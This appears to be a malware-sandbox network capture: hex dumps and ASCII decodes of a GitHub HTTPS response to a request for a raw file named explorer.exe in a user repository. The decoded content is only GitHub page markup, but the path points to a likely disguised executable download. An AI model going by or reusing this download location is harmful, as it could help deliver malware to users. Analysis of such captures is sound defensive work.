                                                                                                                                  2022-10-17 20:07:12 UTC480INData Raw: 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 6e 74 65 72 70 72 69 73 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 6e 74 65 72 70 72 69 73 65 3b 26 71 75 6f 74 3b 7d 22
                                                                                                                                  Data Ascii: ta-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Enterprise&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Enterprise;&quot;}"
                                                                                                                                  2022-10-17 20:07:12 UTC481INData Raw: 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 49 2f 43 44 20 26 61 6d 70 3b 61 6d 70
                                                                                                                                  Data Ascii: -dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to CI/CD &amp;amp
                                                                                                                                  2022-10-17 20:07:12 UTC482INData Raw: 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 44 65 76 4f 70 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f
                                                                                                                                  Data Ascii: uot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:DevOps;&quot;}" href="https://resources.github.com/devops/"> DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-co
                                                                                                                                  2022-10-17 20:07:12 UTC484INData Raw: 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41 2e 32 35 2e 32 35 20 30 20 30 31 31 30 2e 36 30 34 20 31 7a 4d 33 2e 37 35
                                                                                                                                  Data Ascii: ticon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A.25.25 0 0110.604 1zM3.75
                                                                                                                                  2022-10-17 20:07:12 UTC485INData Raw: 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 52 65 73 6f 75 72 63 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 0a 20 20 20 20 20 20 52 65 73 6f 75 72 63 65 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d
                                                                                                                                  Data Ascii: uot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Resources;&quot;}" href="https://resources.github.com/"> Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-com
                                                                                                                                  2022-10-17 20:07:12 UTC486INData Raw: 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64 65 72 4d 65 6e 75 2d 69 63 6f 6e 20 6d 6c 2d 31 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 37 38 20 36 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 30 36 6c 2d 34 2e 32 35 20 34 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 20 30 4c 33 2e 32 32 20 37 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 38 20 39 2e 39 34 6c 33 2e 37 32 2d 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72
                                                                                                                                  Data Ascii: cticon-chevron-down HeaderMenu-icon ml-1"> <path fill-rule="evenodd" d="M12.78 6.22a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06 0L3.22 7.28a.75.75 0 011.06-1.06L8 9.94l3.72-3.72a.75.75 0 011.06 0z"></path></svg> </button> <div class="Header
                                                                                                                                  2022-10-17 20:07:12 UTC488INData Raw: 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 54 68 65 20 52 65 61 64
                                                                                                                                  Data Ascii: ction&quot;:&quot;click to go to The ReadME Project&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:The ReadME Project;&quot;}" href="/readme"> <div> <div class="color-fg-default h4">The Read
                                                                                                                                  2022-10-17 20:07:12 UTC489INData Raw: 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6c 6c 65 63 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f
                                                                                                                                  Data Ascii: nk lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&quot;:&quot;click to go to Collections&quot;,&quot;label&quot;:&quo
                                                                                                                                  2022-10-17 20:07:12 UTC490INData Raw: 63 68 20 73 69 74 65 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 22 0a 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 69 74 65 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 74 79 70 65 3d 22 55 73 65 72 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 69 64 3d 22 31 31 35 30 37 39 34 34 37 22 20 64 61 74 61 2d 73 63 6f 70 65 64 2d
                                                                                                                                  Data Ascii: ch site-scoped-search js-jump-to"> <div class="position-relative"> ... '"` -->... </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="User" data-scope-id="115079447" data-scoped-
                                                                                                                                  2022-10-17 20:07:12 UTC492INData Raw: 66 66 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 31 53 7a 71 64 63 4e 69 7a 38 74 76 36 65 66 39 42 78 5f 2d 61 48 73 66 77 65 33 61 48 70 5f 65 74 44 56 66 58 7a 48 53 53 4a 79 5f 41 48 4c 4d 65 51 52 4d 6b 61 37 59 4c 78 76 61 6a 33 6e 4c 69 6d 54 34 66 6e 4f 37 6d 64 64 62 4f 55 33 6d 69 54 6d 75 34 67 22 20 64 61 74 61 2d 63 73 72 66 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 2d 63 73 72 66 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d
                                                                                                                                  Data Ascii: ff" > <input type="hidden" value="1SzqdcNiz8tv6ef9Bx_-aHsfwe3aHp_etDVfXzHSSJy_AHLMeQRMka7YLxvaj3nLimT4fnO7mddbOU3miTmu4g" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-
                                                                                                                                  2022-10-17 20:07:12 UTC493INData Raw: 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e
                                                                                                                                  Data Ascii: iew-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.
                                                                                                                                  2022-10-17 20:07:12 UTC494INData Raw: 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61
                                                                                                                                  Data Ascii: jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="ava
                                                                                                                                  2022-10-17 20:07:12 UTC496INData Raw: 65 72 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 35 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 20 70 2d 32 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 4e 6f 20 73 75 67 67 65 73 74 65 64 20 6a 75 6d 70 20 74 6f 20 72 65 73 75 6c 74 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 69 64 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 20 72 6f 6c 65 3d 22 6c 69 73 74 62 6f 78 22 20 63 6c 61 73 73 3d 22 70 2d 30 20 6d 2d 30 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 72 65 73 75 6c 74 73 2d 63 6f 6e 74 61
                                                                                                                                  Data Ascii: er flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-fg-muted">No suggested jump to results</span> </li></ul><ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-conta
                                                                                                                                  2022-10-17 20:07:12 UTC497INData Raw: 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31
                                                                                                                                  Data Ascii: <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1
                                                                                                                                  2022-10-17 20:07:12 UTC498INData Raw: 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65
                                                                                                                                  Data Ascii: target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this use
                                                                                                                                  2022-10-17 20:07:12 UTC500INData Raw: 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39
                                                                                                                                  Data Ascii: repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9
                                                                                                                                  2022-10-17 20:07:12 UTC501INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e
                                                                                                                                  Data Ascii: > <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion
                                                                                                                                  2022-10-17 20:07:12 UTC502INData Raw: 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 67 6c 6f 62 61 6c 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72
                                                                                                                                  Data Ascii: <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr
                                                                                                                                  2022-10-17 20:07:12 UTC504INData Raw: 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72
                                                                                                                                  Data Ascii: 5.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Sear
